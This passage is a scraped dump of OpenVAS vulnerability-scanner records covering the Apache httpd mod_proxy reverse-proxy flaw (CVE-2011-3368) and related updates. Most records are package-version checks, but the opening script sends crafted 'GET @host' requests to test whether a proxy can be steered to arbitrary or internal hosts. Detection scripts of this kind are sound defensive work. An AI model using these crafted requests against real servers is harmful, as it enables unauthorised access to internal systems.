5424 $\");\n\n script_name(\"Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability\");\n\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/bid/49957\");\n script_xref(name : \"URL\" , value : \"http://httpd.apache.org/\");\n script_xref(name : \"URL\" , value : \"http://seclists.org/fulldisclosure/2011/Oct/232\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web Servers\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"gb_get_http_banner.nasl\");\n script_mandatory_keys(\"apache/banner\");\n script_require_ports(\"Services/www\", 80);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , 
value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\n\nbanner = get_http_banner(port: port);\nif(banner && (\"Apache\" >!< banner && banner !~ \"HTTP/1.. 50[2|3]\"))exit(0);\n\nreq = string(\"GET @localhost HTTP/1.0\\r\\n\\r\\n\");\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(ereg(pattern:\"HTTP/1.. 400\", string:result))exit(0); # 400 means not vulnerable\n\nip3 = \"5555.6666.7777.8888\"; \n\nreq = string(\"GET @\", ip3 ,\" HTTP/1.0\\r\\n\\r\\n\");\n\nresult2 = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(ereg(pattern:\"HTTP/1.. 200\", string:result2) && \"Bad Gateway\" >< result2 ||\n ereg(pattern:\"HTTP/1.. 502\", string:result2)) { \n\n security_message(port:port);\n exit(0);\n \n} \n\n# CVE-2011-4317\nreq = string(\"GET @localhost::65535 HTTP/1.0\\r\\n\\r\\n\");\nresult = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(ereg(pattern:\"HTTP/1.. 
503\", string:result)) {\n security_message(port:port);\n exit(0);\n} \n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:07", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:881450", "href": "http://plugins.openvas.org/nasl.php?oid=881450", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_id(881450);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:33", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-10-21T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1392-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870505", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310870505", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1392-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00016.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870505\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"RHSA\", value:\"2011:1392-01\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"RedHat Update for httpd RHSA-2011:1392-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(5|4)\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent\", 
rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:16", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881450", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881450\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n 
{\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-11-11T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881032", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:54:14 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-07-30T00:00:00", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310881436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881436", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881436\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:52:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, 
{"lastseen": "2019-05-29T18:36:42", "description": "Oracle Linux Local Security Checks ELSA-2011-1391", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2011-1391", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122068", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122068", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2011-1391.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
